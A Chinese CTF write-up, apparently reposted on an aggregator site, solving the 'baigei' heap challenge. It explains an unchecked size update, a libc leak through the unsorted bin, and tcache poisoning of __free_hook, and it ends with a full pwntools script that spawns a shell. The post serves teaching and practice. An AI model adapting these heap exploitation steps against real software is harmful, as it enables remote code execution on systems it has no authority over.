[长安杯 2021学生组]baigei

news2024/11/15 22:46:09

Index

  • 前言
  • 介绍
    • 漏洞
  • 利用思路
  • 利用过程
    • 一.编写交互函数
    • 二.填充Tcache Bin
    • 三.释放Tcache Bin
    • 四.获取Libc地址
    • 五.Tcache Bin Attack
    • 六.完整EXP:

前言

最近有点迷茫,开始放松自己了。
心态还不是很对,需要继续调整。

介绍

本题是一题经典的堆题,拥有增删改查功能。
在线题目可以在NSSCTF中找到。
[长安杯 2021学生组]baigei

漏洞

Free函数将chunk ptr置零,因此不存在UAF漏洞。

  free(*((void **)&unk_2020E0 + v1));
  *((_QWORD *)&unk_2020E0 + v1) = 0LL;

Add函数存在逻辑漏洞。

v1 = sub_9A9();
  if ( v1 > 0xF )
    return puts("error!");
  puts("size?");
  nbytes = sub_9A9();
  qword_202060[v1] = nbytes;
  if ( nbytes > 1024 )
    return puts("error!");
  chunk_ptr = malloc(nbytes);

函数会首先修改变量,也就是堆的大小为输入的数据,再进行验算。
即使验算不通过也不会退出程序,只会打印出error。
利用这点我们可以做到堆溢出。只需要修改大小比先前大再编辑内容即可。

利用思路

首先通过Unsorted Bin Attack泄露Libc的地址。
然后利用Add函数内的堆溢出漏洞修改__free_hooksystem
之后free即可getshell。

思路很简单,实际上实现起来还是比较困难的。
至少对我而言是这样。

利用过程

一.编写交互函数

def add(idx, size, content = b'a'):
    io.sendlineafter(b'>>\n', b'1')
    io.sendlineafter(b'idx?\n', str(idx))
    io.sendlineafter(b'size?\n', str(size))
    io.sendafter(b'content?\n', content)


def free(idx):
    io.sendlineafter(b'>>\n', b'2')
    io.sendlineafter(b'idx?\n', str(idx))


def edit(idx, size, content):
    io.sendlineafter(b'>>\n', b'3')
    io.sendlineafter(b'idx?\n', str(idx))
    io.sendlineafter(b'size?\n', str(size))
    io.sendafter(b'content?\n', content)


def show(idx):
    io.sendlineafter(b'>>\n', b'4')
    io.sendlineafter(b'idx?\n', str(idx))

先定义好和程序交互的函数,需要注意的是在content部分的交互不能使用sendlineafter

二.填充Tcache Bin

从glibc2.26开始引入了一个freed chunk管理机制:Tcache
Tcache使用的是单链表的数据结构,与Fastbin比较相似。
由于泄露Libc需要用到Unsorted Bin Attack,因此我们首先填充掉所有的Tcache Bin。
与Fastbin相同,同一大小的Bin只需要同时存在7个就无法放入其中。
利用这个机制,我们申请8个大小一样的Tcache Bin,再全部释放,就能得到一个Unsorted Bin。
为了防止Unsorted Bin被合并进入Top Chunk。我们额外申请一个chunk。大小任意。

for i in range(8):
    add(i, 0x80)
add(8, 0x10)

我们使用for循环,创建了8个大小为0x80的堆。
在这里插入图片描述
可以看到现在内存中有8个大小为0x90的堆,一个大小为0x20的堆。

三.释放Tcache Bin

在这里插入图片描述
可以看到现在第八个堆已经指向了main_arena的附近。但是由于Free函数不存在UAF漏洞,我们无法直接调用。
我们需要使用另一个技巧:
当存在Unsorted Bin时,我们申请一块大小小于Unsorted Bin的chunk,这个chunk的bk地址就会指向main_arena的一处固定偏移的地址。

四.获取Libc地址

我们重新申请7个大小为0x80的Tcache Chunk。这样会让程序从Unsorted Bin中分割大小作为Chunk。

for i in range(7):
    add(i, 0x80)
add(9, 0x20, b'a'*8)

parseheap中,我们新建的堆应该是0x30大小。
在这里插入图片描述
可以看到堆块成功创建,使用指令x/8gx查看堆块内容。
在这里插入图片描述
在这里插入图片描述
堆块的bk指针指向了main_arena+224附近。
利用这个堆块,我们可以得到Libc的基址。
我们使用add(9)申请堆块,自然我们的show函数参数就是9。

show(9)

就会打印出堆块中的内容。
由于malloc函数返回的指针是指向userdata部分的。而userdata部分正好是从fd开始的。因此我们接收完fd指针后就是我们的bk指针,我们也可以使用recvuntil接收。

libcbase = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

这里接收的是main_arena + 224的地址,我们需要进行计算才能得到基址。
通过print函数我们可以打印出这个地址。

print(hex(libcbase))

在这里插入图片描述
使用这个地址减去GDB中的libc地址就能得到偏移。
注意,这里不能使用上一次获得的地址,必须是同一次,因为每一次地址都会变动
在这里插入图片描述
在这里插入图片描述
得到偏移0x3ebd20
因此真正的Libc基址是

libc_base = libcbase - 0x3ebd20

五.Tcache Bin Attack

我们首先将Unsorted Bin申请回来。

add(0, 0x50)

在这里插入图片描述
然后通过libc基址计算出free_hook和system的地址。

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']

接下来我们申请3个大小为0x10的堆块,构造我们的利用链。

add(1, 0x10)
add(2, 0x10)
add(3, 0x10)

在这里插入图片描述
再释放掉chunk 2和chunk 3,令chunk 2和chunk 3进入Tcache Bin中。

free(3)
free(2)

在这里插入图片描述
在这里插入图片描述
然后利用add函数的逻辑Bug,修改chunk 1的大小为0x410。
为什么是0x410呢?因为Tcache Bin默认堆块最大大小为0x410。
这里使用0x410主要是为了退出add函数。

  nbytes = sub_9A9();
  qword_202060[v1] = nbytes;
  if ( nbytes > 1024 )                       
    return puts("error!");

我们修改了堆块的大小(实际上堆块的Chunk Header并未被修改,修改的是程序所记录的堆块大小的变量。
这样可以让我们使用edit函数进行堆溢出。

io.sendlineafter(b'>>\n', b'1')
io.sendlineafter(b'idx?\n', str(1))
io.sendlineafter(b'size?\n', str(0x410))

edit(1, 0x28, p64(0) * 3 + p64(0x21) + p64(free_hook))

在这里我们修改了chunk 1的下一个chunk,也就是0x5642f979f710 的内容。修改了它的fd指针为__free_hook函数的地址。
这里的0x28是可以自定义的,不论是0x50还是0x100都能成功Getshell。
但是必须大于等于0x28,因为这里我们覆盖了5个参数,至少需要5 * 8 = 40也就是十六进制0x28大小的数。
然后我们申请2个0x10大小的堆块。

add(4, 0x10, b'/bin/sh\x00')
add(5, 0x10, p64(system))

把binsh以及system函数地址送入,随后触发__free_hook函数即可getshell。

free(4)

在这里插入图片描述

六.完整EXP:

from pwn import *

context(os='linux', arch='amd64' , log_level='debug')
io = process('./baigei')
#io = remote('node4.anna.nssctf.cn', 28399)
elf = ELF('./baigei')
libc = ELF('/home/kaguya/Desktop/how2heap-master/glibc-all-in-one/libs/2.27-3ubuntu.14_amd64/libc-2.27.so')

def debug():
    gdb.attach(io)
    pause()

def add(idx, size, content = b'a'):
    io.sendlineafter(b'>>\n', b'1')
    io.sendlineafter(b'idx?\n', str(idx))
    io.sendlineafter(b'size?\n', str(size))
    io.sendafter(b'content?\n', content)


def free(idx):
    io.sendlineafter(b'>>\n', b'2')
    io.sendlineafter(b'idx?\n', str(idx))


def edit(idx, size, content):
    io.sendlineafter(b'>>\n', b'3')
    io.sendlineafter(b'idx?\n', str(idx))
    io.sendlineafter(b'size?\n', str(size))
    io.sendafter(b'content?\n', content)


def show(idx):
    io.sendlineafter(b'>>\n', b'4')
    io.sendlineafter(b'idx?\n', str(idx))


# Leak Libc
for i in range(8):
    add(i, 0x80)
add(8, 0x10)
for i in range(8):
    free(i)
for i in range(7):
    add(i, 0x80)
add(9, 0x20, b'a'*8)
show(9)

libcbase = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base = libcbase - 0x3ebd20
print(hex(libc_base))

add(0, 0x50)

# Tcache Bin Attack
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']

add(1, 0x10)
add(2, 0x10)
add(3, 0x10)
free(3)
free(2)

# Change Chunk size
io.sendlineafter(b'>>\n', b'1')
io.sendlineafter(b'idx?\n', str(1))
io.sendlineafter(b'size?\n', str(0x410))

edit(1, 0x28, p64(0) * 3 + p64(0x21) + p64(free_hook))
add(4, 0x10, b'/bin/sh\x00')
add(5, 0x10, p64(system))

# Getshell
free(4)
io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/431539.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Java学习笔记:内部类,静态内部类,匿名内部类

​这是本人学习的总结,主要学习资料如下 疯狂Java讲义第三版,李刚编,电子工业出版社出版 目录 1、内部类1.1、内部类简介1.2、内部类与外部类的关系和区别:1.3、内部类的语法 2、 非静态内部类3、静态内部类4、匿名内部类 1、内部…

“链引擎”入驻案例 | 每天超过35万条存证上链,长安链支撑链上价值流动

引言 长安链“链引擎”计划(Powered by Chainmaker)(简称:PBC计划)是由长安链生态联盟发起的一项应用赋能计划,旨在以长安链技术体系为核心支撑,汇聚产业各方力量,为应用方提供技术、品牌、生态等支持&…

Keil系列教程03_主窗口和工具栏详细说明

1写在前面 本文先让大家简单认识一下Keil的主窗口界面,然后再进一步认识Keil的文件、编译和调试工具栏。 Toolbars工具栏就是在菜单下面的两行快捷图标按钮,这些快捷按钮之所以在工具栏里面,在于它们使用的频率较高。比如保存按钮、编译按钮…

ChatGPT智能AI对话软件

ChatGPT智能AI的市场前景非常广阔,因为随着人工智能技术的不断发展和应用,人们对于智能AI对话系统的需求也越来越大。未来,智能AI对话系统将在各个领域得到广泛应用,例如智能客服、智能家居、自动驾驶等等,这些都有助于…

STM32 HAL库PID控制电机 第二章 TB6612FNG芯片驱动GB37-520电机

STM32 HAL库PID控制电机 第二章 TB6612FNG芯片驱动GB37-520电机(HAL库) 1 电路图 2 TB6612简介 TB6612是双驱动,可同时驱动两个电机 STBY:接单片机的IO口清零电机全部停止,置1通过AIN1 AIN2,BIN1,BIN2 来控制正反转…

linux下静态库和动态库的制作

一.静态库的制作 linux下库的命名规则:在linux下以libXXX.a为命名,lib(library)前缀是固定的,代表这个是库。接下来介绍静态库的制作流程。 1.1通过gcc编译获得.o文件 一般源程序经过预处理完成头文件和宏的展开&am…

运行时内存数据区之虚拟机栈——局部变量表

这篇内容十分重要,文字也很多,仔细阅读后,你必定有所收获! 基本内容 与程序计数器一样,Java虚拟机栈(Java Virtual Machine Stack)也是线程私有的,它的生命周期与线程相同。虚拟机栈描述的是Java方法执行的线程内存模型&#xf…

我想知道,就目前形势而言,学java好还是C++好?

前言 就现实点看看,可以对比现在Java和C的市场占有率,可以看到,到目前为止,Java在国内编程语言的市场仍然是占据着大头,在招聘当中Java的人数占有率仍然是遥遥领先于C,Java目前开阔的市场以及其巨大的岗位…

阿里,字节,拼多多,B站挨个面试一遍,你们猜哪个待遇最高?

我面试的是软件测试岗位,去年中旬的时候从原来的公司离职了,不是工作不好,而是公司发展速度太慢,自己干了几年,也没有太大的成长。以我目前的工作经验和实力,我认为准备一两个月,进大厂不是什么…

VS2022下载安装与基本使用(写C语言)

最近遇到一种问题,就是想要写一写C语言的代码,但是网页编辑器功能不全,GCC需要安装Liunx系统,VS又体量太大过于复杂,用keil又需要连接硬件,所以比较纠结。 工作中通常使用的是Keil,但是如果有时…

有记忆功能的动态通讯录

目录 前言1.进行文件操作的改造1.1contact.h的改造1.2contact.c的改造1.3test.c的改造 2.带文件操作的动态通讯录源码2.1contact.h2.2contact.c2.3test.c 总结 前言 前面我们一起学习的动态通讯录,一退出此程序联系人的信息就不见了;学习了文件操作操作后…

cocos creator 中使用web worker

1.应用场景:一些阻塞线程的方法可以放到worker里面去执行,不影响主线程,避免页面卡顿。 啊,有人就会说了,setTimeout不就可以了吗,还有什么async... JS本身就是单线程设计的,不管你是setTimeo…

EIGRP配置邻居关系详解

1.2 EIGRP 邻居关系 1.2.1 实验目的 通过 EIGRP 邻居建立的相关实验,学习到如何调整 EIGRP 的 HELLO 和 HOLD 时间,使用 被动接口阻止不必要的邻居关系,认证 EIGRP 邻居,静态邻居的配置以及哪些参数影响 EIGRP 邻居建立。 1.2.…

【数据库】Redis数据类型详解

目录一、5种基本数据类型1. String2. List3. Hash4. Set5. ZSet二、3种特殊类型1. Bitmap2. HyperLogLog3. Geospatial index一、5种基本数据类型 Redis 共有 5 种基本数据结构:String(字符串)、List(列表)、Set&#…

【CVPR轻量级网络】- 追求更高的FLOPS(FasterNet)

文章目录 题目:摘要1 介绍CNN中FLOPs的计算 2 相关工作3 PConv和FasterNet的设计3.1 偏卷积作为基本算子(PConv)3.2 PConv后接PWConv3.3 FasterNet作为通用骨干 4实验 题目: Run, Don’t Walk: Chasing Higher FLOPS for Faster Neural Netw…

Android---Jetpack之Paging

目录 Paging 组件的意思 Paging 支持的架构类型 Paging 的工作原理 PositionalDataSource PagekeyedDataSource ItemKeyedDataSource BoundaryCallback Paging 组件的意思 分页加载是在应用程序开发过程中十分常见的需求,Paging 就是 Google 为了方便 Andr…

JAVA局域网监听软件的设计与开发

网络监听软件是提供给网络安全管理人员进行安全管理的工具,可以用来监视网络的状态、数据流动情况以及网络上传输的信息,以获取有用信息。作为黑客来说,通过网络监听可以获取其所需信息(比如密码等);对黑客…

初中级Android工程师如何快速成长寻求突破

前言 写这篇文章的初衷是看到很多同学在一家公司工作了三五年,因为技术没有得到提升而随着年龄的增长导致不敢提出涨薪和跳槽找工作。希望这篇文章能够给这些还是初中级Android工程师的朋友一些启发。 快速成长 我们在向领导提出加薪申请或者是准备跳槽到更大的平…

概率机器学习笔记

1.单变量高斯混合分布 原书对结果的得出没有给出解释,我比较困惑,网上找到了一篇推导的帖子,看完就明白了。 式2.49的解释: 红框即为关键处,这是显而易见的期望,不过是条件方差的期望: 该证明的作者&…

共阳(共阴)LED数码管编码交互演示

LED数码管原理 LED数码管有两大类,一类是共阴极接法,另一类是共阳极接法,共阴极就是各段的显示字码共用一个电源的负极,是高电平点亮,共阳极就是各段的显示字码共用一个电源的正极,是低电平点亮。只要控制…